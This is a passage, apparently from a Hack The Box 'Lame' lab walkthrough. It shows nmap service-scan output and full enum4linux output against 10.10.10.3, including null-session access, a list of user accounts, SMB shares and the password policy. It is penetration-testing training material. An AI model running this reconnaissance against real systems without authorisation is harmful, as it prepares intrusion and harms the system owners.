class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ftp-syst: </span></span><span class="line"><span class="cl"><span class="p">|</span> STAT: </span></span><span class="line"><span class="cl"><span class="p">|</span> FTP server status: </span></span><span class="line"><span class="cl"><span class="p">|</span> Connected to 10.10.16.11 </span></span><span class="line"><span class="cl"><span class="p">|</span> Logged in as ftp </span></span><span class="line"><span class="cl"><span class="p">|</span> TYPE: ASCII </span></span><span class="line"><span class="cl"><span class="p">|</span> No session bandwidth limit </span></span><span class="line"><span class="cl"><span class="p">|</span> Session timeout in seconds is <span class="m">300</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Control connection is plain text </span></span><span class="line"><span class="cl"><span class="p">|</span> Data connections will be plain text </span></span><span class="line"><span class="cl"><span class="p">|</span> vsFTPd 2.3.4 - secure, fast, stable </span></span><span class="line"><span class="cl"><span class="p">|</span>_End of status </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">1024</span> 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd <span class="o">(</span>DSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-dss AAAAB3NzaC1kc3MAAACBALz4hsc8a2Srq4nlW960qV8xwBG0JC+jI7fWxm5METIJH4tKr/xUTwsTYEYnaZLzcOiy21D3ZvOwYb6AA3765zdgCd2Tgand7F0YD5UtXG7b7fbz99chReivL0SIWEG/E96Ai+pqYMP2WD5KaOJwSIXSUajnU5oWmY5x85sBw+XDAAAAFQDFkMpmdFQTF+oRqaoSNVU7Z+hjSwAAAIBCQxNKzi1TyP+QJIFa3M0oLqCVWI0We/ARtXrzpBOJ/dt0hTJXCeYisKqcdwdtyIn8OUCOyrIjqNuA2QW217oQ6wXpbFh+5AQm8Hl3b6C6o8lX3Ptw+Y4dp0lzfWHwZ/jzHwtuaDQaok7u1f971lEazeJLqfiWrAzoklqSWyDQJAAAAIA1lAD3xWYkeIeHv/R3P9i+XaoI7imFkMuYXCDTq843YU6Td+0mWpllCqAWUV/CQamGgQLtYy5S0ueoks01MoKdOMMhKVwqdr08nvCBdNKjIEd3gH6oBk/YRnjzxlEAYBsvCmM4a0jmhz0oNiRWlc/F+bkUeFKrBx/D2fdfZmhrGg<span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew<span class="o">==</span> </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span> </span></span><span class="line"><span class="cl">445/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span> </span></span><span class="line"><span class="cl">3632/tcp open distccd syn-ack distccd v1 <span class="o">((</span>GNU<span class="o">)</span> 4.2.4 <span class="o">(</span>Ubuntu 4.2.4-1ubuntu4<span class="o">))</span> </span></span><span class="line"><span class="cl">Service Info: OSs: Unix, Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ms-sql-info: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> p2p-conficker: </span></span><span class="line"><span class="cl"><span class="p">|</span> Checking <span class="k">for</span> Conficker.C or higher... </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">1</span> <span class="o">(</span>port 59488/tcp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">2</span> <span class="o">(</span>port 46758/tcp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">3</span> <span class="o">(</span>port 14597/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">4</span> <span class="o">(</span>port 40169/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ 0/4 checks are positive: Host is CLEAN or ports are blocked </span></span><span class="line"><span class="cl"><span class="p">|</span>_smb-os-discovery: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_smb-security-mode: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_smb2-security-mode: Couldn<span class="err">&#39;</span>t establish a SMBv2 connection. </span></span><span class="line"><span class="cl"><span class="p">|</span>_smb2-time: Protocol negotiation failed <span class="o">(</span>SMB2<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="enum4linux">enum4linux </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span><span class="lnt">174 </span><span class="lnt">175 </span><span class="lnt">176 </span><span class="lnt">177 </span><span class="lnt">178 </span><span class="lnt">179 </span><span class="lnt">180 </span><span class="lnt">181 </span><span class="lnt">182 </span><span class="lnt">183 </span><span class="lnt">184 </span><span class="lnt">185 </span><span class="lnt">186 </span><span class="lnt">187 </span><span class="lnt">188 </span><span class="lnt">189 </span><span class="lnt">190 </span><span class="lnt">191 </span><span class="lnt">192 </span><span class="lnt">193 </span><span class="lnt">194 </span><span class="lnt">195 </span><span class="lnt">196 </span><span class="lnt">197 </span><span class="lnt">198 </span><span class="lnt">199 </span><span class="lnt">200 </span><span class="lnt">201 </span><span class="lnt">202 </span><span class="lnt">203 </span><span class="lnt">204 </span><span class="lnt">205 </span><span class="lnt">206 </span><span class="lnt">207 </span><span class="lnt">208 </span><span class="lnt">209 </span><span class="lnt">210 </span><span class="lnt">211 </span><span class="lnt">212 </span><span class="lnt">213 </span><span class="lnt">214 </span><span class="lnt">215 </span><span class="lnt">216 </span><span class="lnt">217 </span><span class="lnt">218 </span><span class="lnt">219 </span><span class="lnt">220 </span><span class="lnt">221 </span><span class="lnt">222 </span><span class="lnt">223 </span><span class="lnt">224 </span><span class="lnt">225 </span><span class="lnt">226 </span><span class="lnt">227 </span><span class="lnt">228 </span><span class="lnt">229 </span><span class="lnt">230 </span><span class="lnt">231 </span><span class="lnt">232 </span><span class="lnt">233 </span><span class="lnt">234 </span><span class="lnt">235 </span><span class="lnt">236 </span><span class="lnt">237 </span><span class="lnt">238 </span><span class="lnt">239 </span><span class="lnt">240 </span><span class="lnt">241 </span><span class="lnt">242 </span><span class="lnt">243 </span><span class="lnt">244 </span><span class="lnt">245 </span><span class="lnt">246 </span><span class="lnt">247 </span><span class="lnt">248 </span><span class="lnt">249 </span><span class="lnt">250 </span><span class="lnt">251 </span><span class="lnt">252 </span><span class="lnt">253 </span><span class="lnt">254 </span><span class="lnt">255 </span><span class="lnt">256 </span><span class="lnt">257 </span><span class="lnt">258 </span><span class="lnt">259 </span><span class="lnt">260 </span><span class="lnt">261 </span><span class="lnt">262 </span><span class="lnt">263 </span><span class="lnt">264 </span><span class="lnt">265 </span><span class="lnt">266 </span><span class="lnt">267 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ enum4linux 10.10.10.3 </span></span><span class="line"><span class="cl">Starting enum4linux v0.9.1 <span class="o">(</span> http://labs.portcullis.co.uk/application/enum4linux/ <span class="o">)</span> on Tue Dec <span class="m">17</span> 17:01:25 <span class="nv">2024</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">=========================================(</span> Target Information <span class="o">)=========================================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Target ........... 10.10.10.3 </span></span><span class="line"><span class="cl">RID Range ........ 500-550,1000-1050 </span></span><span class="line"><span class="cl">Username ......... <span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl">Password ......... <span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl">Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, <span class="nv">none</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">=============================(</span> Enumerating Workgroup/Domain on 10.10.10.3 <span class="o">)=============================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>E<span class="o">]</span> Can<span class="s1">&#39;t find workgroup/domain </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> =================================( Nbtstat Information for 10.10.10.3 )================================= </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">Looking up status of 10.10.10.3 </span></span></span><span class="line"><span class="cl"><span class="s1">No reply from 10.10.10.3 </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> ====================================( Session Check on 10.10.10.3 )==================================== </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Server 10.10.10.3 allows sessions using username &#39;&#39;, password &#39;&#39; </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> =================================( Getting domain SID for 10.10.10.3 )================================= </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">Domain Name: WORKGROUP </span></span></span><span class="line"><span class="cl"><span class="s1">Domain Sid: (NULL SID) </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Can&#39;</span>t determine <span class="k">if</span> host is part of domain or part of a <span class="nv">workgroup</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">====================================(</span> OS information on 10.10.10.3 <span class="o">)====================================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>E<span class="o">]</span> Can<span class="s1">&#39;t get OS info with smbclient </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Got OS info for 10.10.10.3 from srvinfo: </span></span></span><span class="line"><span class="cl"><span class="s1"> LAME Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian) </span></span></span><span class="line"><span class="cl"><span class="s1"> platform_id : 500 </span></span></span><span class="line"><span class="cl"><span class="s1"> os version : 4.9 </span></span></span><span class="line"><span class="cl"><span class="s1"> server type : 0x9a03 </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> ========================================( Users on 10.10.10.3 )======================================== </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games Name: games Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody Name: nobody Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy Name: proxy Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x6 RID: 0xbba acb: 0x00000010 Account: user Name: just a user,111,, Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data Name: www-data Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root Name: root Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news Name: news Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres Name: PostgreSQL administrator,,, Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin Name: bin Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail Name: mail Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon Name: daemon Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man Name: man Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp Name: lp Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql Name: MySQL Server,,, Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats Name: Gnats Bug-Reporting System (admin) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup Name: backup Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin Name: msfadmin,,, Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys Name: sys Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service Name: ,,, Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x1e RID: 0x434 acb: 0x00000011 Account: list Name: Mailing List Manager Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc Name: ircd Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55 Name: (null) Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync Name: sync Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1">index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp Name: uucp Desc: (null) </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">user:[games] rid:[0x3f2] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[nobody] rid:[0x1f5] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[bind] rid:[0x4ba] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[proxy] rid:[0x402] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[syslog] rid:[0x4b4] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[user] rid:[0xbba] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[www-data] rid:[0x42a] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[root] rid:[0x3e8] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[news] rid:[0x3fa] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[postgres] rid:[0x4c0] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[bin] rid:[0x3ec] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[mail] rid:[0x3f8] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[distccd] rid:[0x4c6] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[proftpd] rid:[0x4ca] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[dhcp] rid:[0x4b2] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[daemon] rid:[0x3ea] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[sshd] rid:[0x4b8] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[man] rid:[0x3f4] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[lp] rid:[0x3f6] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[mysql] rid:[0x4c2] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[gnats] rid:[0x43a] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[libuuid] rid:[0x4b0] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[backup] rid:[0x42c] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[msfadmin] rid:[0xbb8] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[telnetd] rid:[0x4c8] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[sys] rid:[0x3ee] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[klog] rid:[0x4b6] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[postfix] rid:[0x4bc] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[service] rid:[0xbbc] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[list] rid:[0x434] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[irc] rid:[0x436] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[ftp] rid:[0x4be] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[tomcat55] rid:[0x4c4] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[sync] rid:[0x3f0] </span></span></span><span class="line"><span class="cl"><span class="s1">user:[uucp] rid:[0x3fc] </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> ==================================( Share Enumeration on 10.10.10.3 )================================== </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> Sharename Type Comment </span></span></span><span class="line"><span class="cl"><span class="s1"> --------- ---- ------- </span></span></span><span class="line"><span class="cl"><span class="s1"> print$ Disk Printer Drivers </span></span></span><span class="line"><span class="cl"><span class="s1"> tmp Disk oh noes! </span></span></span><span class="line"><span class="cl"><span class="s1"> opt Disk </span></span></span><span class="line"><span class="cl"><span class="s1"> IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) </span></span></span><span class="line"><span class="cl"><span class="s1"> ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) </span></span></span><span class="line"><span class="cl"><span class="s1">Reconnecting with SMB1 for workgroup listing. </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> Server Comment </span></span></span><span class="line"><span class="cl"><span class="s1"> --------- ------- </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> Workgroup Master </span></span></span><span class="line"><span class="cl"><span class="s1"> --------- ------- </span></span></span><span class="line"><span class="cl"><span class="s1"> WORKGROUP LAME </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Attempting to map shares on 10.10.10.3 </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">//10.10.10.3/print$ Mapping: DENIED Listing: N/A Writing: N/A </span></span></span><span class="line"><span class="cl"><span class="s1">//10.10.10.3/tmp Mapping: OK Listing: OK Writing: N/A </span></span></span><span class="line"><span class="cl"><span class="s1">//10.10.10.3/opt Mapping: DENIED Listing: N/A Writing: N/A </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[E] Can&#39;</span>t understand response: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">NT_STATUS_NETWORK_ACCESS_DENIED listing <span class="se">\*</span> </span></span><span class="line"><span class="cl">//10.10.10.3/IPC$ Mapping: N/A Listing: N/A Writing: N/A </span></span><span class="line"><span class="cl">//10.10.10.3/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">=============================(</span> Password Policy Information <span class="k">for</span> 10.10.10.3 <span class="o">)=============================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Attaching to 10.10.10.3 using a NULL share </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying protocol 139/SMB... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Found domain<span class="o">(</span>s<span class="o">)</span>: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> LAME </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Builtin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Password Info <span class="k">for</span> Domain: LAME </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Minimum password length: <span class="m">5</span> </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Password <span class="nb">history</span> length: None </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Maximum password age: Not Set </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Password Complexity Flags: <span class="m">000000</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Domain Refuse Password Change: <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Domain Password Store Cleartext: <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Domain Password Lockout Admins: <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Domain Password No Clear Change: <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Domain Password No Anon Change: <span class="m">0</span> </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Domain Password Complex: <span class="m">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Minimum password age: None </span></span><span class="line"><span class="cl"> 